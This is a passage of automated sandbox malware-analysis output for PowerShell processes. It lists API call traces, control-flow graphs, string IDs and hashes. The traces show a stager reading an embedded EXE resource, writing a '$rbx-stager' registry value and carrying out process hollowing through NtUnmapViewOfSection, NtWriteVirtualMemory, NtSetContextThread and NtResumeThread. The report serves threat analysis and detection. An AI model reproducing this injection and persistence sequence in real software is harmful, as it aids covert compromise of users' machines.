        • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
        • String ID: '+'$'+[Char]($)+'
        • API String ID: 3510167801-3465596256
        • Opcode ID: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
        • Instruction ID: 881abd296b23407031799d902d2f4cdc89e37ab1eeb299f195f03ae3526d8067
        • Opcode Fuzzy Hash: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
        • Instruction Fuzzy Hash: B051F1B1E00219ABCB14DFB4DD49AAE7BBDFB48301B14446AF605F7290DB78DA01DB64

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 133 40151a-401547 SysAllocString * 2 CoInitializeEx 134 40154d-401561 CoInitializeSecurity 133->134 135 40165f-401673 SysFreeString * 2 133->135 136 401563-401568 134->136 137 40156e-40158a CoCreateInstance 134->137 136->137 138 401659 CoUninitialize 136->138 137->138 139 401590-4015d5 VariantInit 137->139 138->135 141 4015d7-4015ec 139->141 142 40164d-401656 139->142 141->142 145 4015ee-401603 141->145 142->138 147 401644-401648 145->147 148 401605-401627 VariantInit 145->148 147->142 149 40162b-40162d 148->149 150 40163b-40163f 149->150 151 40162f-401636 149->151 150->147 151->150
        APIs
        • SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
        • SysAllocString.OLEAUT32(0040218C), ref: 00401538
        • CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
        • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
        • VariantInit.OLEAUT32(?), ref: 00401594
        • VariantInit.OLEAUT32(?), ref: 00401609
        • CoUninitialize.COMBASE ref: 00401659
        • SysFreeString.OLEAUT32(00000000), ref: 00401666
        • SysFreeString.OLEAUT32(?), ref: 0040166B
        Strings
        Memory Dump Source
        • Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_34_2_400000_powershell.jbxd
        Similarity
        • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
        • String ID: $rbx-svc32$$rbx-svc64
        • API String ID: 2407135876-384997928
        • Opcode ID: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
        • Instruction ID: a7557972db62563d574e16152cd358301487189799b80a26eca7dc015dd46a94
        • Opcode Fuzzy Hash: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
        • Instruction Fuzzy Hash: FE414471E00219AFDB01EFA4CD899AFBBBDEF49314B140469FA05FB290C6B59D45CB60

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 172 401674-4016a1 SysAllocString * 2 CoInitializeEx 173 401782 172->173 174 4016a7-4016bb CoInitializeSecurity 172->174 177 401785-401797 SysFreeString * 2 173->177 175 4016c8-4016e4 CoCreateInstance 174->175 176 4016bd-4016c2 174->176 178 401777 175->178 179 4016ea-401732 VariantInit 175->179 176->175 176->178 180 40177a-401780 CoUninitialize 178->180 182 401734-40174a 179->182 183 401769 179->183 180->177 184 40176c-401775 182->184 186 40174c-401752 182->186 183->184 184->180 188 401757-401767 186->188 188->184
        APIs
        • SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
        • SysAllocString.OLEAUT32(0040218C), ref: 00401690
        • CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
        • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
        • VariantInit.OLEAUT32(?), ref: 004016EE
        • CoUninitialize.COMBASE ref: 0040177A
        • SysFreeString.OLEAUT32(?), ref: 0040178C
        • SysFreeString.OLEAUT32(00000000), ref: 0040178F
        Strings
        Memory Dump Source
        • Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_34_2_400000_powershell.jbxd
        Similarity
        • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
        • String ID: $rbx-svc32
        • API String ID: 4184240511-186198907
        • Opcode ID: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
        • Instruction ID: fe73214060e0a71e5cb08311afe73f66ef618dc69d1aaa4bc8de0f8b6e607afc
        • Opcode Fuzzy Hash: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
        • Instruction Fuzzy Hash: 85314471A00218AFDB01EFA8CD88DAF7B7DEF49354B104069FA05FB190C6B5AD05CBA4

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 193 401986-4019b1 lstrlenW call 40104b 196 4019b3-4019bd StrStrIW 193->196 197 4019dd-4019e0 193->197 196->197 198 4019bf 196->198 199 4019c0-4019da StrStrIW 198->199 199->199 200 4019dc 199->200 200->197
        APIs
        • lstrlenW.KERNEL32(Get-Delegate,00000000,00402238), ref: 00401999
        • StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 004019B5
        • StrStrIW.SHLWAPI(?,Get-Delegate,75B12EB0), ref: 004019D2
        Strings
        Memory Dump Source
        • Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_34_2_400000_powershell.jbxd
        Similarity
        • API ID: lstrlen
        • String ID: Get-Delegate
        • API String ID: 1659193697-1365458365
        • Opcode ID: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
        • Instruction ID: 00c31201c37e283d491a5759d1d7e9797cf0b304d52834bac4b81ed49e19cba9
        • Opcode Fuzzy Hash: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
        • Instruction Fuzzy Hash: 7EF05B71700218ABDB145BA59E48B9FB7FCAF44344F040077E505F3290EA749E01C664

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 209 401798-40179e call 4017a5 ExitProcess
        APIs
          • Part of subcall function 004017A5: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
          • Part of subcall function 004017A5: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
          • Part of subcall function 004017A5: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
          • Part of subcall function 004017A5: LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
          • Part of subcall function 004017A5: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
          • Part of subcall function 004017A5: RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818
        • ExitProcess.KERNEL32 ref: 0040179E
        Memory Dump Source
        • Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_34_2_400000_powershell.jbxd
        Similarity
        • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
        • String ID:
        • API String ID: 3836967525-0
        • Opcode ID: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
        • Instruction ID: 349935dfe58169e56b8de0d8f460e35c8f36df872e6f4d206b9f951cc53eac22
        • Opcode Fuzzy Hash: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
        • Instruction Fuzzy Hash:

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 212 40118e-40119b GetModuleHandleA 213 4011aa-4011ac 212->213 214 40119d-4011a9 GetProcAddress 212->214
        APIs
        • GetModuleHandleA.KERNEL32(ntdll.dll,00401178,?), ref: 00401193
        • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004011A3
        Strings
        Memory Dump Source
        • Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_34_2_400000_powershell.jbxd
        Similarity
        • API ID: AddressHandleModuleProc
        • String ID: RtlGetVersion$ntdll.dll
        • API String ID: 1646373207-1489217083
        • Opcode ID: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
        • Instruction ID: 0863f5cf0c3234c6e1236f6f2d3f4997342a4c328dcd20e5af414fba7a7cf28b
        • Opcode Fuzzy Hash: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
        • Instruction Fuzzy Hash: D2C09B70F807006AFF151F709F0DB17295859487023540573B305F51D4DAFCC404D52C

        Execution Graph

        Execution Coverage:10.6%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:44.4%
        Total number of Nodes:27
        Total number of Limit Nodes:0

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 871 7ffd9b810c6d-7ffd9b810c79 872 7ffd9b810c84-7ffd9b810cf8 871->872 873 7ffd9b810c7b-7ffd9b810c83 871->873 877 7ffd9b810d02-7ffd9b810d45 NtWriteVirtualMemory 872->877 878 7ffd9b810cfa-7ffd9b810cff 872->878 873->872 879 7ffd9b810d4d-7ffd9b810d6a 877->879 880 7ffd9b810d47 877->880 878->877 880->879
        APIs
        Memory Dump Source
        • Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd
        Similarity
        • API ID: MemoryVirtualWrite
        • String ID:
        • API String ID: 3527976591-0
        • Opcode ID: 4fbfb29fda0ec05ac5a7bac9e9b50ce2e8e63422ab841035bb321bc2e1e1d08b
        • Instruction ID: 480580c0a010a5b078c1763f1dac89e307ddcfe2f4640916a491fcec1eedcbc7
        • Opcode Fuzzy Hash: 4fbfb29fda0ec05ac5a7bac9e9b50ce2e8e63422ab841035bb321bc2e1e1d08b
        • Instruction Fuzzy Hash: 7331D13191DA4C8FDB18EF58D845AE9BBE0FB5A321F04426FD049D3692CB70A806CB85

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 889 7ffd9b80e088-7ffd9b80e0a6
        APIs
        Memory Dump Source
        • Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd
        Similarity
        • API ID: SectionUnmapView
        • String ID:
        • API String ID: 498011366-0
        • Opcode ID: 508c70521e0cf1bfa4ca3e3ce6f09ed8a5f8ead4f1a58e743e6404c5cec75bbb
        • Instruction ID: 0f55708262654c33424e3654b97f05aa700e6f21a6b05c0323db5ba6c2ede3c7
        • Opcode Fuzzy Hash: 508c70521e0cf1bfa4ca3e3ce6f09ed8a5f8ead4f1a58e743e6404c5cec75bbb
        • Instruction Fuzzy Hash: 82314672A0E64C8FEB58DB98D8496A97BF0FBA9310F04406FD089C7163D621A946C751

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 892 7ffd9b80e0ea-7ffd9b810cf8 896 7ffd9b810d02-7ffd9b810d45 NtWriteVirtualMemory 892->896 897 7ffd9b810cfa-7ffd9b810cff 892->897 898 7ffd9b810d4d-7ffd9b810d6a 896->898 899 7ffd9b810d47 896->899 897->896 899->898
        APIs
        Memory Dump Source
        • Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd
        Similarity
        • API ID: MemoryVirtualWrite
        • String ID:
        • API String ID: 3527976591-0
        • Opcode ID: 307b37fe8615ee4ab7b6673974b672b5d9fe178978e2744aae1e4ebc0d95c0f4
        • Instruction ID: c8d141355b9a70a82af955b63ef15528488a92e5d3787d311a15e548f67b0c62
        • Opcode Fuzzy Hash: 307b37fe8615ee4ab7b6673974b672b5d9fe178978e2744aae1e4ebc0d95c0f4
        • Instruction Fuzzy Hash: 0431A37191CA0C8FDB58EF9CD8496F9BBF0FB59711F00422ED04AD3652CB70A8068B85

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 908 7ffd9b810ff4-7ffd9b810ffb 909 7ffd9b810ffd-7ffd9b811005 908->909 910 7ffd9b811006-7ffd9b8110b2 NtResumeThread 908->910 909->910 914 7ffd9b8110b4 910->914 915 7ffd9b8110ba-7ffd9b8110d6 910->915 914->915
        APIs
        Memory Dump Source
        • Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd
        Similarity
        • API ID: ResumeThread
        • String ID:
        • API String ID: 947044025-0
        • Opcode ID: fdefe168d53204d854c5683e0fc882bc7013cbeb17c4293a593048fb6347fe03
        • Instruction ID: 12c4a77abcdfa3c2f5067cf2498ce1d007eafa28a285e236155257598741dbe0
        • Opcode Fuzzy Hash: fdefe168d53204d854c5683e0fc882bc7013cbeb17c4293a593048fb6347fe03
        • Instruction Fuzzy Hash: B031E431E0C64C8FDB58DF98D8467E9BBE1EF6A321F04416BD049D3296CB70A846CB91

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 900 7ffd9b810a4e-7ffd9b810a5b 901 7ffd9b810a5d-7ffd9b810a65 900->901 902 7ffd9b810a66-7ffd9b810b18 NtUnmapViewOfSection 900->902 901->902 906 7ffd9b810b20-7ffd9b810b3c 902->906 907 7ffd9b810b1a 902->907 907->906
        APIs
        Memory Dump Source
        • Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd
        Similarity
        • API ID: SectionUnmapView
        • String ID:
        • API String ID: 498011366-0
        • Opcode ID: 50574ea68c34f3fc1e268e4537a2e3116758d01c98cc23a7a2ca31a3f57d37a4
        • Instruction ID: 7afd1ad98ca50a7b71713fb5c05da3d16aa7bb602c8104e77ecf39435dff67b7
        • Opcode Fuzzy Hash: 50574ea68c34f3fc1e268e4537a2e3116758d01c98cc23a7a2ca31a3f57d37a4
        • Instruction Fuzzy Hash: A731F63090D6888FDB5ADF68C846BE97FF0EF66320F04429FD049C71A7D664A446CB92

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 916 7ffd9b80e0b8-7ffd9b810b18 NtUnmapViewOfSection 921 7ffd9b810b20-7ffd9b810b3c 916->921 922 7ffd9b810b1a 916->922 922->921
        APIs
        Memory Dump Source
        • Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd
        Similarity
        • API ID: SectionUnmapView
        • String ID:
        • API String ID: 498011366-0
        • Opcode ID: 99abbf360738f4902c3222423957fb5c7d07efe2a1c3b926e4819aedec52a5b0
        • Instruction ID: 04176260b38a25e9dec8ed508c39232570be2dc9aaee5bc7677f9c3ed5efba8f
        • Opcode Fuzzy Hash: 99abbf360738f4902c3222423957fb5c7d07efe2a1c3b926e4819aedec52a5b0
        • Instruction Fuzzy Hash: 3E21D571A0DA0C8FDB58DF98D8497E97BE0EBA9320F04416ED04ED3262D675A846CB51

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 923 7ffd9b810f30-7ffd9b810fc8 NtSetContextThread 927 7ffd9b810fd0-7ffd9b810fec 923->927 928 7ffd9b810fca 923->928 928->927
        APIs
        Memory Dump Source
        • Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd
        Similarity
        • API ID: ContextThread
        • String ID:
        • API String ID: 1591575202-0
        • Opcode ID: 4dd787efe090bebee811ddcc184d8dffe193062821f69ee477531355e6d3409e
        • Instruction ID: 79acd357f9a0236292d080c654d2794f48c52fb4f19dc83a0e568b4a5c5c5d77
        • Opcode Fuzzy Hash: 4dd787efe090bebee811ddcc184d8dffe193062821f69ee477531355e6d3409e
        • Instruction Fuzzy Hash: E721D631A0C64C8FDB58DF5CD84A7E97BF0EB69320F04416FD049D7252C6709846CB51

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 929 7ffd9b80e132-7ffd9b8110b2 NtResumeThread 933 7ffd9b8110b4 929->933 934 7ffd9b8110ba-7ffd9b8110d6 929->934 933->934
        APIs
        Memory Dump Source
        • Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd
        Similarity
        • API ID: ResumeThread
        • String ID:
        • API String ID: 947044025-0
        • Opcode ID: e8aede2658e92a5e4e47aafdfd5cf214caf6a636337f48914a05a4a7586cb5cb
        • Instruction ID: 7133e4bb9ca5f2afd5c7fc1afb3621dee621efc5c095e20eb5d2a01c554fea47
        • Opcode Fuzzy Hash: e8aede2658e92a5e4e47aafdfd5cf214caf6a636337f48914a05a4a7586cb5cb
        • Instruction Fuzzy Hash: F8219171A08A1C8FDB58EF98D84ABE9BBE1EB59311F00416ED00DD3255DB70A8468B91
        APIs
        Memory Dump Source
        • Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd
        Similarity
        • API ID: ContextThread
        • String ID:
        • API String ID: 1591575202-0
        • Opcode ID: b9719be189b5ca03971846174e4ec4078c275b46ee87b424947ac382692295e8
        • Instruction ID: b0862cde38a7893e59a987f3704d19986f8ae08fa58f8cf51716d57e8ffa2911
        • Opcode Fuzzy Hash: b9719be189b5ca03971846174e4ec4078c275b46ee87b424947ac382692295e8
        • Instruction Fuzzy Hash: AD217471A0CA0C8FDB58DF9CD84ABF977E0EBA9321F00416ED04DD3255D671A846CB91
        APIs
        Memory Dump Source
        • Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd
        Similarity
        • API ID: ContextThread
        • String ID:
        • API String ID: 1591575202-0
        • Opcode ID: b9719be189b5ca03971846174e4ec4078c275b46ee87b424947ac382692295e8
        • Instruction ID: b0862cde38a7893e59a987f3704d19986f8ae08fa58f8cf51716d57e8ffa2911
        • Opcode Fuzzy Hash: b9719be189b5ca03971846174e4ec4078c275b46ee87b424947ac382692295e8
        • Instruction Fuzzy Hash: AD217471A0CA0C8FDB58DF9CD84ABF977E0EBA9321F00416ED04DD3255D671A846CB91

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd
        Similarity
        • API ID: CreateProcess
        • String ID: ezB$ezB
        • API String ID: 963392458-3585179095
        • Opcode ID: 97c1db02291acafab74fcad24234ae445b93b05962c6695182d577d4772ebb75
        • Instruction ID: bd2dc084b4b0fb00bbd9130ceac061487345ac8937c00333c6b5a3c2cc1a15c0
        • Opcode Fuzzy Hash: 97c1db02291acafab74fcad24234ae445b93b05962c6695182d577d4772ebb75
        • Instruction Fuzzy Hash: 08D1053061DA8D8FEB64DF2CDC567E977E0FF59310F01426AD88DC7292DA34A5418B82

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd
        Similarity
        • API ID: CreateFileMapping
        • String ID: ezB$ezB
        • API String ID: 524692379-3585179095
        • Opcode ID: 30f9177070feaa388080fe4cc9221e133351fd84c0acfe54e8007286a598c883
        • Instruction ID: e08367b57babaa37fd1e006ee6f43fe53ae7c1957f5dd4e190c5db76dcfbba4c
        • Opcode Fuzzy Hash: 30f9177070feaa388080fe4cc9221e133351fd84c0acfe54e8007286a598c883
        • Instruction Fuzzy Hash: CD71183061CA8C4FDB59DF28C8557E57BE1FF59311F1442AEE88DC7292CA75A8418782

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd
        Similarity
        • API ID: CreateFile
        • String ID: ezB$ezB
        • API String ID: 823142352-3585179095
        • Opcode ID: e70fdf78c0b1568743a708f0e6c59b43ae18d144e5108236ecebc009c1ffd14b
        • Instruction ID: df5e9ed85fcdc87d2a07913aa2caa7609e5d78b5f8a1e7b893d01874c50e9455
        • Opcode Fuzzy Hash: e70fdf78c0b1568743a708f0e6c59b43ae18d144e5108236ecebc009c1ffd14b
        • Instruction Fuzzy Hash: 3761DA30A1CB8D4FDB68EF28D8557E577D0FF59311F14426AE88DC7292CA74E9418B82
        Strings
        Memory Dump Source
        • Source File: 00000023.00000002.2724378585.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b8d0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: `
        • API String ID: 0-2679148245
        • Opcode ID: 00eef2e43de043c7ec030d84aa55a3d1a998b8dafc30dfda0bbdeae9adc03065
        • Instruction ID: 137cdcf16c8d55fed67597f6194c1e4bde959139a72936a52745a162479d9ccc
        • Opcode Fuzzy Hash: 00eef2e43de043c7ec030d84aa55a3d1a998b8dafc30dfda0bbdeae9adc03065
        • Instruction Fuzzy Hash: C6134971E1DB890FEB759F6C98965A877E0EFAD700F0606AFD44887197DA20BC01C786
        Memory Dump Source
        • Source File: 00000023.00000002.2724378585.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b8d0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8dd5b2790a376673fe1d52596bee4dc61b7a4bcc104322a19d3cf157b57453c7
        • Instruction ID: a6508c5dfc106aa3162746f017109fa42015d8efb8568d60fa9699d662a26a4d
        • Opcode Fuzzy Hash: 8dd5b2790a376673fe1d52596bee4dc61b7a4bcc104322a19d3cf157b57453c7
        • Instruction Fuzzy Hash: 09F23AB1E1CB854FEB349F6C54969A977D0EFAC700F0606AED44887297DA20FD01CB86

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 862 7ffd9b80ed76-7ffd9b80ed83 863 7ffd9b80ed8e-7ffd9b80ed9f 862->863 864 7ffd9b80ed85-7ffd9b80ed8d 862->864 865 7ffd9b80eda1-7ffd9b80eda9 863->865 866 7ffd9b80edaa-7ffd9b80ee61 MapViewOfFile 863->866 864->863 865->866 869 7ffd9b80ee63 866->869 870 7ffd9b80ee69-7ffd9b80ee86 866->870 869->870
        APIs
        Memory Dump Source
        • Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd
        Similarity
        • API ID: FileView
        • String ID:
        • API String ID: 3314676101-0
        • Opcode ID: 5f998d266ffa447938ddd279f175edce932f9e947402fa8f508d4b5ae87d5e97
        • Instruction ID: afa5f689ec964cbd84256273ed2df5f248f6c815a8e5c649bb9a11ff330e1d9e
        • Opcode Fuzzy Hash: 5f998d266ffa447938ddd279f175edce932f9e947402fa8f508d4b5ae87d5e97
        • Instruction Fuzzy Hash: 6841293190CA889FD71DDB68D806AE97BF0FF5A321F14026ED089D31A2CB757446CB91

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 881 7ffd9b80e7b8-7ffd9b80e7bf 882 7ffd9b80e7c1-7ffd9b80e7c9 881->882 883 7ffd9b80e7ca-7ffd9b80e880 K32GetModuleInformation 881->883 882->883 886 7ffd9b80e882 883->886 887 7ffd9b80e888-7ffd9b80e8b7 883->887 886->887
        APIs
        Memory Dump Source
        • Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd
        Similarity
        • API ID: InformationModule
        • String ID:
        • API String ID: 3425974696-0
        • Opcode ID: 4234e65c2744f926a5b41982156fd53e2c25d2483fe0ed854df867e591b44fb4
        • Instruction ID: 26ae9347f59f8cb2ce1cc03fdbba7ce61cb28bd09a0165bfdd3927eb122e2eab
        • Opcode Fuzzy Hash: 4234e65c2744f926a5b41982156fd53e2c25d2483fe0ed854df867e591b44fb4
        • Instruction Fuzzy Hash: 7C310831D0CA4C4FDB1CDB9898496F97BE1EF69321F04426FD059D3692CB746846CB91

        Execution Graph

        Execution Coverage:1.5%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:0%
        Total number of Nodes:1404
        Total number of Limit Nodes:2
        execution_graph 8561 1fd186d5fcc 8562 1fd186d5fd3 8561->8562 8563 1fd186d6000 VirtualProtect 8562->8563 8565 1fd186d5f10 8562->8565 8564 1fd186d6029 GetLastError 8563->8564 8563->8565 8564->8565 8834 1fd186d824c 8835 1fd186d8270 __scrt_release_startup_lock 8834->8835 8836 1fd186db581 8835->8836 8837 1fd186dcb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8835->8837 8838 1fd186db5aa 8837->8838 8839 1fd186e4848 8842 1fd186d904c 8839->8842 8843 1fd186d9076 8842->8843 8844 1fd186d9064 8842->8844 8846 1fd186d9324 _CreateFrameInfo 9 API calls 8843->8846 8844->8843 8845 1fd186d906c 8844->8845 8847 1fd186d9074 8845->8847 8849 1fd186d9324 _CreateFrameInfo 9 API calls 8845->8849 8848 1fd186d907b 8846->8848 8848->8847 8850 1fd186d9324 _CreateFrameInfo 9 API calls 8848->8850 8851 1fd186d909b 8849->8851 8850->8847 8852 1fd186d9324 _CreateFrameInfo 9 API calls 8851->8852 8853 1fd186d90a8 8852->8853 8854 1fd186dc2f4 14 API calls 8853->8854 8855 1fd186d90b1 8854->8855 8856 1fd186dc2f4 14 API calls 8855->8856 8857 1fd186d90bd 8856->8857 8130 1fd186dad48 8131 1fd186d9324 _CreateFrameInfo 9 API calls 8130->8131 8132 1fd186dad7d 8131->8132 8133 1fd186d9324 _CreateFrameInfo 9 API calls 8132->8133 8134 1fd186dad8b __except_validate_context_record 8133->8134 8135 1fd186d9324 _CreateFrameInfo 9 API calls 8134->8135 8136 1fd186dadcf 8135->8136 8137 1fd186d9324 _CreateFrameInfo 9 API calls 8136->8137 8138 1fd186dadd8 8137->8138 8139 1fd186d9324 _CreateFrameInfo 9 API calls 8138->8139 8140 1fd186dade1 8139->8140 8153 1fd186d993c 8140->8153 8143 1fd186d9324 _CreateFrameInfo 9 API calls 8144 1fd186dae11 __CxxCallCatchBlock 8143->8144 8160 1fd186d9978 8144->8160 8146 1fd186daeeb __CxxCallCatchBlock 8147 1fd186d9324 _CreateFrameInfo 9 API calls 8146->8147 8148 1fd186daefe 8147->8148 8149 1fd186d9324 _CreateFrameInfo 9 API calls 8148->8149 8151 1fd186daf07 8149->8151 8154 1fd186d9324 _CreateFrameInfo 9 API calls 8153->8154 8155 1fd186d994d 8154->8155 8156 1fd186d9324 _CreateFrameInfo 9 API calls 8155->8156 8157 1fd186d9958 8155->8157 8156->8157 8158 1fd186d9324 _CreateFrameInfo 9 API calls 8157->8158 8159 1fd186d9969 8158->8159 8159->8143 8159->8144 8161 1fd186d9324 _CreateFrameInfo 9 API calls 8160->8161 8162 1fd186d998a 8161->8162 8163 1fd186d99c5 8162->8163 8164 1fd186d9324 _CreateFrameInfo 9 API calls 8162->8164 8165 1fd186d9995 8164->8165 8165->8163 8166 1fd186d9324 _CreateFrameInfo 9 API calls 8165->8166 8167 1fd186d99b6 8166->8167 8167->8146 8168 1fd186d8ff8 8167->8168 8169 1fd186d9324 _CreateFrameInfo 9 API calls 8168->8169 8170 1fd186d9006 8169->8170 8170->8146 8858 1fd186dae42 8859 1fd186d9324 _CreateFrameInfo 9 API calls 8858->8859 8861 1fd186dae4f __CxxCallCatchBlock 8859->8861 8860 